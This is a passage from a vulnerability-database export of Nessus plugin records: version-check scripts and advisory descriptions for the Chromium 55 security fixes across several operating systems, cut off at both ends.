pdf/pdfium/pdfium_engine.cc, due to improper\n handling of non-visible page unloading. An\n unauthenticated, remote attacker can exploit this to\n dereference already freed memory, resulting in the\n execution of arbitrary code. (CVE-2016-5216)\n\n - A flaw exists in PDFium due to the use of unvalidated\n data by the PDF helper extension. An authenticated,\n remote attacker can exploit this to have an unspecified\n impact. No other details are available. (CVE-2016-5217)\n\n - A flaw exists when handling chrome.tabs API navigations\n and displaying the pending URL. An unauthenticated,\n remote attacker can exploit this to spoof the Omnibox\n address. (CVE-2016-5218)\n\n - An information disclosure vulnerability exists in\n PDFium, due to improper handling of 'file: navigation',\n that allows an unauthenticated, remote attacker to\n disclose local files. (CVE-2016-5220)\n\n - An integer overflow condition exists in ANGLE due to\n improper validation of user-supplied input. An\n unauthenticated, remote attacker can exploit this to\n have an unspecified impact. (CVE-2016-5221)\n\n - A flaw exists in the NavigatorImpl::NavigateToEntry()\n function within file frame_host/navigator_impl.cc due to\n improper handling of invalid URLs. An unauthenticated,\n remote attacker can exploit this to spoof the Omnibox\n address. (CVE-2016-5222)\n\n - An integer overflow condition exists in PDFium within\n file core/fpdfapi/page/cpdf_page.cpp that allows an\n authenticated, remote attacker to have an unspecified\n impact. No other details are available. (CVE-2016-5223)\n\n - A security bypass vulnerability exists in the SVG\n component due to denorm handling not being disabled\n before calling Skia filter code. An unauthenticated,\n remote attacker can exploit this to bypass the\n same-origin policy. (CVE-2016-5224)\n\n - A flaw exists in Blink, specifically in the\n HTMLFormElement::scheduleFormSubmission() function\n within file html/HTMLFormElement.cpp, due to improper\n enforcement of the form-action CSP (Content Security\n Policy). An unauthenticated, remote attacker can exploit\n this to bypass intended access restrictions.\n (CVE-2016-5225)\n\n - A cross-site scripting (XSS) vulnerability exists in\n Blink within file ui/views/tabs/tab_strip.cc due to\n improper validation of input when dropping JavaScript\n URLs on a tab. An unauthenticated, remote attacker can\n exploit this to execute arbitrary script code in a\n user's browser session. (CVE-2016-5226)\n\n - An unspecified flaw exists that allows an\n unauthenticated, remote attacker to disclose Content\n Security Policy (CSP) referrers. (CVE-2016-9650)\n\n - An unspecified flaw exists in V8 within lookup.cc that\n allows unauthorized private property access. An\n unauthenticated, remote attacker can exploit this to\n execute arbitrary code. (CVE-2016-9651)\n\n - Multiple other vulnerabilities exist, the most serious\n of which can be exploited by an authenticated, remote\n attacker to execute arbitrary code. (CVE-2016-9652)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n # https://googlechromereleases.blogspot.com/2016/12/stable-channel-update-for-desktop.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?bfe6e9a5\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome version 55.0.2883.75 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-9652\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/05/31\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_google_chrome_installed.nbin\");\n script_require_keys(\"MacOSX/Google Chrome/Installed\");\n\n exit(0);\n}\n\ninclude(\"google_chrome_version.inc\");\n\nget_kb_item_or_exit(\"MacOSX/Google Chrome/Installed\");\n\ngoogle_chrome_check_version(fix:'55.0.2883.75', severity:SECURITY_HOLE, xss:TRUE);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-01T16:40:37", "description": "This update to Chromium 55.0.2883.75 fixes the following vulnerabilities :\n\n - CVE-2016-9651: Private property access in V8\n\n - CVE-2016-5208: Universal XSS in Blink\n\n - CVE-2016-5207: Universal XSS in Blink\n\n - CVE-2016-5206: Same-origin bypass in PDFium\n\n - CVE-2016-5205: Universal XSS in Blink\n\n - CVE-2016-5204: Universal XSS in Blink\n\n - CVE-2016-5209: Out of bounds write in Blink\n\n - CVE-2016-5203: Use after free in PDFium\n\n - CVE-2016-5210: Out of bounds write in PDFium\n\n - CVE-2016-5212: Local file disclosure in DevTools\n\n - CVE-2016-5211: Use after free in PDFium\n\n - CVE-2016-5213: Use after free in V8\n\n - CVE-2016-5214: File download protection bypass\n\n - CVE-2016-5216: Use after free in PDFium\n\n - CVE-2016-5215: Use after free in Webaudio\n\n - CVE-2016-5217: Use of unvalidated data in PDFium\n\n - CVE-2016-5218: Address spoofing in Omnibox\n\n - CVE-2016-5219: Use after free in V8\n\n - CVE-2016-5221: Integer overflow in ANGLE\n\n - CVE-2016-5220: Local file access in PDFium\n\n - CVE-2016-5222: Address spoofing in Omnibox\n\n - CVE-2016-9650: CSP Referrer disclosure\n\n - CVE-2016-5223: Integer overflow in PDFium\n\n - CVE-2016-5226: Limited XSS in Blink\n\n - CVE-2016-5225: CSP bypass in Blink\n\n - CVE-2016-5224: Same-origin bypass in SVG\n\n - CVE-2016-9652: Various fixes from internal audits, fuzzing and other initiatives\n\nThe default bookmarks override was removed.\n\nThe following packaging changes are included :\n\n - Switch to system libraries: harfbuzz, zlib, ffmpeg, where available.\n\n - Chromium now requires harfbuzz >= 1.3.0", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-12-14T00:00:00", "type": "nessus", "title": "openSUSE Security Update : Chromium (openSUSE-2016-1453)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-5203", "CVE-2016-5204", "CVE-2016-5205", "CVE-2016-5206", "CVE-2016-5207", "CVE-2016-5208", "CVE-2016-5209", "CVE-2016-5210", "CVE-2016-5211", "CVE-2016-5212", "CVE-2016-5213", "CVE-2016-5214", "CVE-2016-5215", "CVE-2016-5216", "CVE-2016-5217", "CVE-2016-5218", "CVE-2016-5219", "CVE-2016-5220", "CVE-2016-5221", "CVE-2016-5222", "CVE-2016-5223", "CVE-2016-5224", "CVE-2016-5225", "CVE-2016-5226", "CVE-2016-9650", "CVE-2016-9651", "CVE-2016-9652"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:chromedriver", "p-cpe:/a:novell:opensuse:chromedriver-debuginfo", "p-cpe:/a:novell:opensuse:chromium", "p-cpe:/a:novell:opensuse:chromium-debuginfo", "p-cpe:/a:novell:opensuse:chromium-debugsource", "p-cpe:/a:novell:opensuse:chromium-ffmpegsumo", "p-cpe:/a:novell:opensuse:chromium-ffmpegsumo-debuginfo", "cpe:/o:novell:opensuse:13.2", "cpe:/o:novell:opensuse:42.1", "cpe:/o:novell:opensuse:42.2"], "id": "OPENSUSE-2016-1453.NASL", "href": "https://www.tenable.com/plugins/nessus/95788", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2016-1453.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(95788);\n script_version(\"3.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2016-5203\", \"CVE-2016-5204\", \"CVE-2016-5205\", \"CVE-2016-5206\", \"CVE-2016-5207\", \"CVE-2016-5208\", \"CVE-2016-5209\", \"CVE-2016-5210\", \"CVE-2016-5211\", \"CVE-2016-5212\", \"CVE-2016-5213\", \"CVE-2016-5214\", \"CVE-2016-5215\", \"CVE-2016-5216\", \"CVE-2016-5217\", \"CVE-2016-5218\", \"CVE-2016-5219\", \"CVE-2016-5220\", \"CVE-2016-5221\", \"CVE-2016-5222\", \"CVE-2016-5223\", \"CVE-2016-5224\", \"CVE-2016-5225\", \"CVE-2016-5226\", \"CVE-2016-9650\", \"CVE-2016-9651\", \"CVE-2016-9652\");\n\n script_name(english:\"openSUSE Security Update : Chromium (openSUSE-2016-1453)\");\n script_summary(english:\"Check for the openSUSE-2016-1453 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update to Chromium 55.0.2883.75 fixes the following\nvulnerabilities :\n\n - CVE-2016-9651: Private property access in V8\n\n - CVE-2016-5208: Universal XSS in Blink\n\n - CVE-2016-5207: Universal XSS in Blink\n\n - CVE-2016-5206: Same-origin bypass in PDFium\n\n - CVE-2016-5205: Universal XSS in Blink\n\n - CVE-2016-5204: Universal XSS in Blink\n\n - CVE-2016-5209: Out of bounds write in Blink\n\n - CVE-2016-5203: Use after free in PDFium\n\n - CVE-2016-5210: Out of bounds write in PDFium\n\n - CVE-2016-5212: Local file disclosure in DevTools\n\n - CVE-2016-5211: Use after free in PDFium\n\n - CVE-2016-5213: Use after free in V8\n\n - CVE-2016-5214: File download protection bypass\n\n - CVE-2016-5216: Use after free in PDFium\n\n - CVE-2016-5215: Use after free in Webaudio\n\n - CVE-2016-5217: Use of unvalidated data in PDFium\n\n - CVE-2016-5218: Address spoofing in Omnibox\n\n - CVE-2016-5219: Use after free in V8\n\n - CVE-2016-5221: Integer overflow in ANGLE\n\n - CVE-2016-5220: Local file access in PDFium\n\n - CVE-2016-5222: Address spoofing in Omnibox\n\n - CVE-2016-9650: CSP Referrer disclosure\n\n - CVE-2016-5223: Integer overflow in PDFium\n\n - CVE-2016-5226: Limited XSS in Blink\n\n - CVE-2016-5225: CSP bypass in Blink\n\n - CVE-2016-5224: Same-origin bypass in SVG\n\n - CVE-2016-9652: Various fixes from internal audits,\n fuzzing and other initiatives\n\nThe default bookmarks override was removed.\n\nThe following packaging changes are included :\n\n - Switch to system libraries: harfbuzz, zlib, ffmpeg,\n where available.\n\n - Chromium now requires harfbuzz >= 1.3.0\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1013236\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected Chromium packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromedriver\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromedriver-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-ffmpegsumo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-ffmpegsumo-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.2\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/01/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/14\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.2|SUSE42\\.1|SUSE42\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.2 / 42.1 / 42.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.2\", reference:\"chromedriver-55.0.2883.75-148.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"chromedriver-debuginfo-55.0.2883.75-148.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"chromium-55.0.2883.75-148.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"chromium-debuginfo-55.0.2883.75-148.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"chromium-debugsource-55.0.2883.75-148.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"chromium-ffmpegsumo-55.0.2883.75-148.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"chromium-ffmpegsumo-debuginfo-55.0.2883.75-148.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"chromedriver-55.0.2883.75-99.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"chromedriver-debuginfo-55.0.2883.75-99.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"chromium-55.0.2883.75-99.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"chromium-debuginfo-55.0.2883.75-99.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"chromium-debugsource-55.0.2883.75-99.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", cpu:\"x86_64\", reference:\"chromedriver-55.0.2883.75-99.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", cpu:\"x86_64\", reference:\"chromedriver-debuginfo-55.0.2883.75-99.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", cpu:\"x86_64\", reference:\"chromium-55.0.2883.75-99.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", cpu:\"x86_64\", reference:\"chromium-debuginfo-55.0.2883.75-99.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", cpu:\"x86_64\", reference:\"chromium-debugsource-55.0.2883.75-99.2\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromedriver / chromedriver-debuginfo / chromium / etc\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:38:40", "description": "The version of Google Chrome installed on the remote host is prior to 55.0.2883.75, and is affected by multiple vulnerabilities :\n\n - A flaw exists in the 'TIFFFetchDirectory()' function in 'tif_dirread.c' related to use of uninitialized memory. This may allow a context-dependent attacker to have an unspecified impact. No further details have been provided.\n - An unspecified out-of-bounds write flaw exists that is triggered as certain input is not properly validated. This may allow a context-dependent attacker to potentially execute arbitrary code.\n - A flaw exists that allows a universal cross-site scripting (UXSS) attack. This flaw exists because the 'V8EventListener::getListenerFunction()' function in 'bindings/core/v8/V8EventListener.cpp' allows running the 'handleEvent' getter on forbidden script. This may allow a context-dependent attacker to execute arbitrary script code in a user's browser session within the trust relationship between their browser and any website.\n - A use-after-free error exists in the 'Document::removeField()' function in 'fpdfsdk/javascript/Document.cpp' that is triggered when handling the removal of fields within a document. This may allow a context-dependent attacker to dereference already freed memory and potentially execute arbitrary code.\n - An unspecified use-after-free error exists that is triggered as certain input is not properly validated. This may allow a context-dependent attacker to dereference already freed memory and potentially execute arbitrary code.\n - An integer overflow condition exists in 'core/fpdfapi/page/cpdf_page.cpp' that may allow a context-dependent attacker to have an unspecified impact. No further details have been provided by the vendor.\n - A use-after-free error exists in 'pdf/pdfium/pdfium_engine.cc' that is triggered when handling non-visible page unloading. This may allow a context-dependent attacker to dereference already freed memory and potentially execute arbitrary code.\n - An out-of-bounds write flaw exists in the 'CWeightTable::GetPixelWeightSize()' function in 'core/fxge/dib/fx_dib_engine.cpp'. This may allow a context-dependent attacker to corrupt memory and potentially execute arbitrary code.\n - A flaw exists that allows a UXSS attack. This flaw exists because the program permits frame swaps during frame detach. This may allow a context-dependent attacker to execute arbitrary script code in a user's browser session within the trust relationship between their browser and any website.\n - A flaw exists in the DevTools component that is triggered as certain URLs are not properly validated. This may allow a context-dependent attacker to disclose the contents of arbitrary files.\n - A flaw exists that allows a UXSS attack. The issue is triggered when handling triggered events during e.g. closing a color chooser for an input element. This may allow a context-dependent attacker to execute arbitrary script code in a user's browser session within the trust relationship between their browser and any website.\n - A flaw exists that is triggered when handling 'chrome.tabs' API navigations and displaying the pending URL. This may allow a context-dependent attacker to spoof the omnibox address.\n - A flaw exists in the 'NavigatorImpl::NavigateToEntry()' function in 'content/browser/frame_host/navigator_impl.cc' that is triggered when handling invalid URLs. This may allow a context-dependent attacker to spoof the omnibox address.\n - A flaw exists that allows a UXSS attack. The issue is triggered when handling the 'use' SVG element and calling event listeners on a cloned node. This may allow a context-dependent attacker to execute arbitrary script code in a user's browser session within the trust relationship between their browser and any website.\n - A flaw exists that is triggered when downloading files using e.g. data: URIs, unknown URL schemes, and overly long URLs. This may allow a context-dependent attacker to cause a file to be downloaded without the mark-of-the-web applied.\n - A flaw exists in the 'HTMLFormElement::scheduleFormSubmission()' function in 'html/HTMLFormElement.", "cvss3": {"score": null, "vector": null}, "published": "2016-12-16T00:00:00", "type": "nessus", "title": "Google Chrome < 55.0.2883.75 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-5203", "CVE-2016-5204", "CVE-2016-5205", "CVE-2016-5206", "CVE-2016-5207", "CVE-2016-5208", "CVE-2016-5209", "CVE-2016-5210", "CVE-2016-5211", "CVE-2016-5212", "CVE-2016-5213", "CVE-2016-5214", "CVE-2016-5215", "CVE-2016-5216", "CVE-2016-5217", "CVE-2016-5218", "CVE-2016-5219", "CVE-2016-5220", "CVE-2016-5221", "CVE-2016-5222", "CVE-2016-5223", "CVE-2016-5224", "CVE-2016-5225", "CVE-2016-5226", "CVE-2016-9650", "CVE-2016-9651", "CVE-2016-9652"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:*"], "id": "9829.PASL", "href": "https://www.tenable.com/plugins/nnm/9829", "sourceData": "Binary data 9829.pasl", "cvss": {"score": 10, "vector": "CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-06T03:16:47", "description": "The remote host is affected by the vulnerability described in GLSA-201612-11 (Chromium: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in the Chromium web browser. Please review the CVE identifiers referenced below for details.\n Impact :\n\n A remote attacker could possibly execute arbitrary code with the privileges of the process, cause a Denial of Service condition, obtain sensitive information, or bypass security restrictions.\n Workaround :\n\n There is no known workaround at this time.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-12-05T00:00:00", "type": "nessus", "title": "GLSA-201612-11 : Chromium: Multiple vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-5203", "CVE-2016-5204", "CVE-2016-5205", "CVE-2016-5206", "CVE-2016-5207", "CVE-2016-5208", "CVE-2016-5209", "CVE-2016-5210", "CVE-2016-5211", "CVE-2016-5212", "CVE-2016-5213", "CVE-2016-5214", "CVE-2016-5215", "CVE-2016-5217", "CVE-2016-5218", "CVE-2016-5219", "CVE-2016-5220", "CVE-2016-5221", "CVE-2016-5222", "CVE-2016-5223", "CVE-2016-5224", "CVE-2016-5225", "CVE-2016-5226", "CVE-2016-9650", "CVE-2016-9651", "CVE-2016-9652"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:chromium", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-201612-11.NASL", "href": "https://www.tenable.com/plugins/nessus/95526", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201612-11.\n#\n# The advisory text is Copyright (C) 2001-2019 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(95526);\n script_version(\"3.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-5203\", \"CVE-2016-5204\", \"CVE-2016-5205\", \"CVE-2016-5206\", \"CVE-2016-5207\", \"CVE-2016-5208\", \"CVE-2016-5209\", \"CVE-2016-5210\", \"CVE-2016-5211\", \"CVE-2016-5212\", \"CVE-2016-5213\", \"CVE-2016-5214\", \"CVE-2016-5215\", \"CVE-2016-5217\", \"CVE-2016-5218\", \"CVE-2016-5219\", \"CVE-2016-5220\", \"CVE-2016-5221\", \"CVE-2016-5222\", \"CVE-2016-5223\", \"CVE-2016-5224\", \"CVE-2016-5225\", \"CVE-2016-5226\", \"CVE-2016-9650\", \"CVE-2016-9651\", \"CVE-2016-9652\");\n script_xref(name:\"GLSA\", value:\"201612-11\");\n\n script_name(english:\"GLSA-201612-11 : Chromium: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201612-11\n(Chromium: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in the Chromium web\n browser. Please review the CVE identifiers referenced below for details.\n \nImpact :\n\n A remote attacker could possibly execute arbitrary code with the\n privileges of the process, cause a Denial of Service condition, obtain\n sensitive information, or bypass security restrictions.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201612-11\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Chromium users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose\n '>=www-client/chromium-55.0.2883.75'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/01/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/05\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"www-client/chromium\", unaffected:make_list(\"ge 55.0.2883.75\"), vulnerable:make_list(\"lt 55.0.2883.75\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Chromium\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-06T03:16:49", "description": "Update to Chromium 55. \n\nSecurity fix for CVE-2016-5199, CVE-2016-5200, CVE-2016-5201, CVE-2016-5202, CVE-2016-9651, CVE-2016-5208, CVE-2016-5207, CVE-2016-5206, CVE-2016-5205, CVE-2016-5204, CVE-2016-5209, CVE-2016-5203, CVE-2016-5210, CVE-2016-5212, CVE-2016-5211, CVE-2016-5213, CVE-2016-5214, CVE-2016-5216, CVE-2016-5215, CVE-2016-5217, CVE-2016-5218, CVE-2016-5219, CVE-2016-5221, CVE-2016-5220, CVE-2016-5222, CVE-2016-9650, CVE-2016-5223, CVE-2016-5226, CVE-2016-5225, CVE-2016-5224, CVE-2016-9652\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-12-16T00:00:00", "type": "nessus", "title": "Fedora 25 : chromium (2016-a815b7bf5d)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-5199", "CVE-2016-5200", "CVE-2016-5201", "CVE-2016-5202", "CVE-2016-5203", "CVE-2016-5204", "CVE-2016-5205", "CVE-2016-5206", "CVE-2016-5207", "CVE-2016-5208", "CVE-2016-5209", "CVE-2016-5210", "CVE-2016-5211", "CVE-2016-5212", "CVE-2016-5213", "CVE-2016-5214", "CVE-2016-5215", "CVE-2016-5216", "CVE-2016-5217", "CVE-2016-5218", "CVE-2016-5219", "CVE-2016-5220", "CVE-2016-5221", "CVE-2016-5222", "CVE-2016-5223", "CVE-2016-5224", "CVE-2016-5225", "CVE-2016-5226", "CVE-2016-9650", "CVE-2016-9651", "CVE-2016-9652"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:chromium", "cpe:/o:fedoraproject:fedora:25"], "id": "FEDORA_2016-A815B7BF5D.NASL", "href": "https://www.tenable.com/plugins/nessus/95903", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 